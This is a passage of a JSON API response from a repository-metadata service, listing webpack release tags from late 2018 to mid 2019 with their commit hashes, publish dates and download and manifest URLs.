url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.1/manifests"},{"name":"v4.36.0","sha":"95d21bb39a1e700f28be776b300492c50a169fc7","kind":"tag","published_at":"2019-07-17T11:32:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.36.0/manifests"},{"name":"v5.0.0-alpha.18","sha":"9d05b680f02b7bdae81eff47a18f95d1f21ed053","kind":"tag","published_at":"2019-07-08T20:25:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.18","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.18/manifests"},{"name":"v4.35.3","sha":"4ec90ceba4206aeb91d4c0f7e12dc889d238001e","kind":"tag","published_at":"2019-07-08T13:53:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.3/manifests"},{"name":"v5.0.0-alpha.17","sha":"7ade38d01107be2f55277b61fb683341884cdc7c","kind":"tag","published_at":"2019-07-01T10:22:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.17","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.17/manifests"},{"name":"v4.35.2","sha":"bf3e869a423a60581dcb64e215b8d14403e997f2","kind":"tag","published_at":"2019-07-01T09:18:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.2/manifests"},{"name":"v4.35.1","sha":"569dd6a2d2e31f218578c79a4b25dfe61baf6c08","kind":"tag","published_at":"2019-07-01T09:07:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.1/manifests"},{"name":"v4.35.0","sha":"c3377ef76ec708ed9c55314e8386f438abea178c","kind":"tag","published_at":"2019-06-19T19:15:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.35.0/manifests"},{"name":"v5.0.0-alpha.16","sha":"56b8aa7006df3c7c9d6634dd11fc6a9f5bac9644","kind":"tag","published_at":"2019-06-14T13:25:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.16","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.16/manifests"},{"name":"v4.34.0","sha":"34c86675728430c0f41fe415dbbacf87b5a2875d","kind":"tag","published_at":"2019-06-12T23:10:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.34.0/manifests"},{"name":"v5.0.0-alpha.15","sha":"224daec09d68f17ef705eafc9ecafeb3fa7fd7a9","kind":"tag","published_at":"2019-06-05T16:38:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.15","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.15/manifests"},{"name":"v4.33.0","sha":"d45bec3518f53153287ff2cad3cfae9d2b248d9a","kind":"tag","published_at":"2019-06-04T19:32:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.33.0/manifests"},{"name":"v5.0.0-alpha.14","sha":"0037e7355a147cf0fe8df9c56f1b9515b1a87f88","kind":"tag","published_at":"2019-05-23T07:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.14","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.14/manifests"},{"name":"v4.32.2","sha":"5d3004cccd3dd5af2721c39a7a8a27b12b3d0c19","kind":"tag","published_at":"2019-05-22T23:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.2/manifests"},{"name":"v4.32.1","sha":"87fc33edbec46f721a2186194f2bc0c8fc14b464","kind":"tag","published_at":"2019-05-22T06:30:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.1/manifests"},{"name":"v5.0.0-alpha.13","sha":"8d05c28e9c679f77cd054a84e261525773092b06","kind":"tag","published_at":"2019-05-20T12:55:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.13/manifests"},{"name":"v4.32.0","sha":"bbe71d89cb7a8c1cc81ce1e17929d8de2260ff80","kind":"tag","published_at":"2019-05-20T09:53:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.32.0/manifests"},{"name":"v5.0.0-alpha.12","sha":"e72fed4877c59d6d842a3596328c6e045d2b5eca","kind":"tag","published_at":"2019-05-10T22:40:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.12/manifests"},{"name":"v4.31.0","sha":"2e1e1799b1fc56b68dbddbe8712ff6393654ccbd","kind":"tag","published_at":"2019-05-09T07:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.31.0/manifests"},{"name":"v4.30.0","sha":"b72b96a2bc5d2c7a308d0943567e0db191d3c358","kind":"tag","published_at":"2019-04-12T20:06:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.30.0/manifests"},{"name":"v4.29.6","sha":"685a0626cb10664133ef2fb2e2f9f4cb3971402a","kind":"tag","published_at":"2019-02-28T09:44:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.6","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.6/manifests"},{"name":"v5.0.0-alpha.11","sha":"589e4e4d9d42401d638c442e5b83bb28213b614a","kind":"tag","published_at":"2019-02-19T10:50:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.11/manifests"},{"name":"v4.29.5","sha":"073813f1913e000302be557272b2d11195f9c2e6","kind":"tag","published_at":"2019-02-18T10:05:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.5/manifests"},{"name":"v4.29.4","sha":"7ecf992bd97204fbfaeed18e3e21fb9fcd46352f","kind":"tag","published_at":"2019-02-15T15:10:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.4/manifests"},{"name":"v5.0.0-alpha.10","sha":"2d7338d2b5cc70c6bd250a878d8a9717cc02cb95","kind":"tag","published_at":"2019-02-07T08:49:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.10/manifests"},{"name":"v4.29.3","sha":"b934e26da8b65bdf36b3c71141d0c2d8397d9f44","kind":"tag","published_at":"2019-02-07T08:22:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.3/manifests"},{"name":"v4.29.2","sha":"74b8aac0adfb0c79d70a99fa86635930db8944fd","kind":"tag","published_at":"2019-02-06T14:05:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.2/manifests"},{"name":"v4.29.1","sha":"6934b9814492b049e67efb3ccf7254d8917e01f9","kind":"tag","published_at":"2019-02-04T17:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.1/manifests"},{"name":"v5.0.0-alpha.9","sha":"92a36b1a9c0ed554c0f7e74bf1bc98c77a768fcc","kind":"tag","published_at":"2019-01-27T12:18:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.9/manifests"},{"name":"v4.29.0","sha":"25bccd4c487a5bf743efc62947d81a8eaa81a90f","kind":"tag","published_at":"2019-01-20T17:38:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.29.0/manifests"},{"name":"v5.0.0-alpha.8","sha":"adff7f61a2595ea9a04c0f3070add21be01607fb","kind":"tag","published_at":"2019-01-19T19:24:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.8/manifests"},{"name":"v5.0.0-alpha.7","sha":"18aca2fcb148d04ba3d0b37742f50534d42a7ec3","kind":"tag","published_at":"2019-01-19T12:11:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.7/manifests"},{"name":"v5.0.0-alpha.6","sha":"4be6797700753a54b223600f01e941580b6a6ba3","kind":"tag","published_at":"2019-01-15T16:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.6/manifests"},{"name":"v4.28.4","sha":"fdb6b139b94273e5b18870262c193a93f65132e8","kind":"tag","published_at":"2019-01-10T15:48:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.4/manifests"},{"name":"v5.0.0-alpha.5","sha":"0d9ed482bc39fb23040ffd26823e0b7ed73320cb","kind":"tag","published_at":"2019-01-09T14:20:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.5/manifests"},{"name":"v5.0.0-alpha.4","sha":"b97bc4bc062cd5395de8b00115519472645d57d0","kind":"tag","published_at":"2019-01-08T14:09:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.4/manifests"},{"name":"v5.0.0-alpha.3","sha":"762155dc2da6795dfe72a5cbeb632fc42c9c49e0","kind":"tag","published_at":"2018-12-29T17:13:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.3/manifests"},{"name":"v4.28.3","sha":"983c2616ec1b869bfb659b6331bd2fe2abc66e23","kind":"tag","published_at":"2018-12-29T11:55:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.3/manifests"},{"name":"v5.0.0-alpha.2","sha":"88f0e18e64c7935723348de3b7dd1aa92050999c","kind":"tag","published_at":"2018-12-26T10:33:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.2/manifests"},{"name":"v5.0.0-alpha.1","sha":"90a0866efcd35401353c9e8d5c904fe2cd407f7e","kind":"tag","published_at":"2018-12-23T20:24:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.1/manifests"},{"name":"v4.28.2","sha":"fe514dd975f1d2dd1546906a6f4c0a6b2a0e3761","kind":"tag","published_at":"2018-12-22T12:53:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.2/manifests"},{"name":"v5.0.0-alpha.0","sha":"3f068c38610a1edfd6be2adf53a2dea44525cfde","kind":"tag","published_at":"2018-12-21T14:17:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.0/manifests"},{"name":"v4.28.1","sha":"7a6a71f1e9349f86833de12a673805621f0fc6f6","kind":"tag","published_at":"2018-12-20T17:10:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.1/manifests"},{"name":"v4.28.0","sha":"e871eeb121a69efd6cbfa56f977d5843bf030202","kind":"tag","published_at":"2018-12-19T10:37:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.28.0/manifests"},{"name":"v4.27.1","sha":"4056506488c1e071dfc9a0127daa61bf531170bf","kind":"tag","published_at":"2018-12-05T19:13:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.1/manifests"},{"name":"v4.27.0","sha":"f47bf8b64f9698cb05eff62832a04267823039cf","kind":"tag","published_at":"2018-12-04T09:31:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.27.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.27.0","manifests_url":"https://repos.ecosys